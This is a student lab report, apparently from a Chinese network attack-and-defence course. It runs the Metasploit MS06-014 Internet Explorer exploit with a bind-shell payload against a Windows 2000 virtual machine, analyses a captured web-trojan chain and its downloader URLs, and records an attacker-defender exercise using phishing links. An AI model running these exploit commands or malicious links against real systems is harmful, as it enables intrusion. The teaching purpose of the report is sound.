20232940 陈璧 2023-2024-2 《网络攻防实践》实践十一报告

20232940陈璧 2024-06-13 18:55:46

1.实践内容

(1)web浏览器渗透攻击
任务:使用攻击机和Windows靶机进行浏览器渗透攻击实验,体验网页木马构造及实施浏览器攻击的实际过程。
(2)取证分析实践—网页木马攻击场景分析
(3)攻防对抗实践—web浏览器渗透攻击攻防
攻击方使用Metasploit构造出至少两个不同Web浏览端软件安全漏洞的渗透攻击代码,并进行混淆处理之后组装成一个URL,通过具有欺骗性的电子邮件发送给防守方。
防守方对电子邮件中的挂马链接进行提取、解混淆分析、尝试恢复出渗透代码的原始形态,并分析这些渗透代码都是攻击哪些Web浏览端软件的哪些安全漏洞。

2.实践过程

2.1web浏览器渗透攻击

实验步骤:
①选择使用Metasploit中的MS06-014渗透攻击模块
②选择PAYLOAD为任意远程Shell连接
③设置服务器地址和URL参数,运行exploit,构造出恶意网页木马脚本
④在靶机环境中启动浏览器,验证与服务器的连通性,并访问恶意网页木马脚本URL
⑤在攻击机的Metasploit软件中查看渗透攻击状态,并通过成功渗透攻击后建立起的远程控制会话SESSION,在靶机上远程执行命令
首先查看攻击机和靶机的IP地址,然后测试攻击机和靶机的连通性,发现可以ping通:

img

img


在Kali上使用sudo msfconsole 打开Metasploit:

img


输入命令:search MS06-014,搜索MS06-014漏洞,输入命令:use exploit/windows/browser/ie_createobject
输入命令:set payload windows/shell/bind_tcp,加载使用的payload,输入命令:show options 查看其他设置:

img

img


然后进行exploit,生成恶意网页http://192.168.1.112:8080/mFgnjsLWuHyt

img

靶机使用浏览器访问该URL:

img


此时攻击机得到一个会话,输入命令:sessions -i 1,选择会话1,返回shell,可以查看靶机的IP:

img

2.2取证分析实践—网页木马攻击场景分析

实践过程:
①首先你应该访问start.html,在这个文件中给出了new09.htm的地址
②在进入 htm 后,每解密出一个文件地址,请对其作 32 位 MD5 散列,以散列值为文件名到 http://192.168.68.253/scom/hashed/
哈希值下去下载对应的文件(注意:文件名中的英文字母为小写,且没有扩展名),即为解密出的地址对应的文件。
③如果解密出的地址给出的是网页或脚本文件,请继续解密。
④如果解密出的地址是二进制程序文件,请进行静态反汇编或动态调试。
⑤重复以上过程直到这些文件被全部分析完成。
首先在记事本中打开start.html文件:

img


在文件里搜索 new09.htm 可以找到两处,从下面两图可以发现 new09.htm 在被引用时,使用的是相对路径而不是绝对路径,因此可以知道 new09.htm 与 start.html 必须处于同一文件目录下

img


查看 new09.htm 文件,可以发现在该文件中也引用了两个文件,一个是在 iframe 标签中的 http://aa.18dd.net/aa/kl.htm ,另一个是js标签中的 http://js.users.51.la/1299644.js

img

对这两个网址分别做MD5散列:
http://aa.18dd.net/aa/kl.htm 的MD5的散列值为:7f60672dcd6b5e90b6772545ee219bd3
http://js.users.51.la/1299644.js 的MD5的散列值为:23180a42a2ff1192150231b44ffdf3d3
在hashed文件夹里面找到这两个链接散列值的文件

img


打开这两个文件查看其内容:
从 7f60672dcd6b5e90b6772545ee219bd3 文件中可以发现,文件末尾处有加密密钥的相关信息,并且它的加密方式为XXTEA结合base64;
t=utf8to16(xxtea_decrypt(base64decode(t), '\x73\x63\x72\x69\x70\x74'));
从下图可以发现,23180a42a2ff1192150231b44ffdf3d3 文件中只有一段注释:

img

将 \x73\x63\x72\x69\x70\x74 密钥从16进制转为字符串,发现其代表的字符串为:script

img


得到script后,再利用在线XXTEA在线加密解密工具进行解密,对超长的字符串解密

img

将解密后的相关16进制部分转为字符串:

img

通过分析文件我们可以看出文件里使用了“Adodb.Stream”(微软数据库访问对象)、“MPS.StormPlayer”(暴风影音)、POWERPLAYER.PowerPlayerCtrl.1”(PPStream)和“BaiduBar.Tool”(百度搜霸)外调函数漏洞
同时获取四个漏洞对应引用的四个文件的md5散列值:
http://aa.18dd.net/aa/1.js%E7%9A%84md5%E5%80%BC%E4%B8%BA%EF%BC%9A5d7e9058a857aa2abee820d5473c5fa4
http://aa.18dd.net/aa/b.js%E7%9A%84md5%E5%80%BC%E4%B8%BA%EF%BC%9A3870c28cc279d457746b3796a262f166
http://aa.18dd.net/aa/pps.js%E7%9A%84md5%E5%80%BC%E4%B8%BA%EF%BC%9A5f0b8bf0385314dbe0e5ec95e6abedc2
http://down.18dd.net/bb/bd.cab%E7%9A%84md5%E5%80%BC%E4%B8%BA%EF%BC%9A 1c1d7b3539a617517c49eee4120783b2
打开其md5值对应的文件转换为字符:

img


该文件使用了packed加密,利用在线工具进行解密 http://yige.org/packer
通过分析解密后的代码可以发现该文件利用下载器 shellcode,下载了 http://down.18dd.net/bb/bf.exe 文件
可以发现该文件是一个压缩文件,进行解压后,电脑里杀毒软件会自动将其视为蠕虫病毒,直接删除,因此需要在虚拟机里进行解压
在win2000中解压后可以得到一个bd.exe文件

img


获取前三个文件的所要下载的文件的MD5值:
http://down.18dd.net/bb/014.exe MD5值为: ca4e4a1730b0f69a9b94393d9443b979
http://down.18dd.net/bb/bf.exe MD5值为: 268cbd59fbed235f6cf6b41b92b03f8e
http://down.18dd.net/bb/pps.exe MD5值为:ff59b3b8961f502289c1b4df8c37e2a4
于是我们有了四个 exe 文件,即 014.exe,bf.exe,pps.exe,bd.exe。在资源中找到对应的文件,可以发现四个文件的大小相同,进一步对文件内容进行 MD5 散列计算得出结论,这四个文件内容完全相同!那么我们只需要分析其中的任意一个文件即可。
使用IDA反汇编bd.exe,在string window中发现了20个用于下载exe文件的链接,猜测是用来下载各种木马

img

img


从下图可以看到"cmd /c date 1981-01-12"、"cmd /c date "、"del %0"等字符串,可以推测可能是在更改系统日期或是尝试删除某些文件

img

2.3 攻防对抗实践—web浏览器渗透攻击攻防

攻击方 cb 20232940 kali 192.168.1.112
防守方 why 20232909 win2k 192.168.1.106
首先测试能否ping通防守方主机

img


然后输入以下命令:
search MS06-014
use exploit/windows/browser/ie_createobject
set payload windows/shell/bind_tcp
show options

img

img

img


最后输入 exploit,构造钓鱼链接,诱骗防守方点击 http://192.168.1.112:8080/2rQrI3h
攻击方 why 20232909 192.168.31.176
防守方 cb 20232940 win2k 192.168.31.203

防守方收到攻击方发来的链接 http://192.168.31.176:8080/YwVO5OJvh

img

img

阅读代码,可以看到其中使用到 document.location 加载了payload,并且下一行中后面跟了一个可执行文件 FrDXRBzNQYhLaOComvCyoVi.exe,猜想这个可执行文件应该是以攻击机为服务器,通过网页下载到防守方主机上的,所以我们打开任务管理器查看正在运行的进程,能够发现出现的那个可执行文件

img

3.学习中遇到的问题及解决

问题1:攻击时没ping通why的
问题1解决方案:改成桥接模式

4.实践总结

通过本周实践主要学习了web浏览器渗透攻击,网页木马攻击场景分析以及攻防对抗实践等,需要学习相关知识较多。通过以上学习也进一步加深了自己对web浏览器渗透攻击,网页木马攻击场景分析以及攻防对抗实践的理解。

...全文
229 回复 打赏 收藏 转发到动态 举报
AI 作业
写回复
用AI写文章
回复
切换为时间正序
请发表友善的回复…
发表回复

54

社区成员

发帖
与我相关
我的任务
社区描述
网络攻防实践课程
网络安全 高校
社区管理员
  • blackwall0321
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧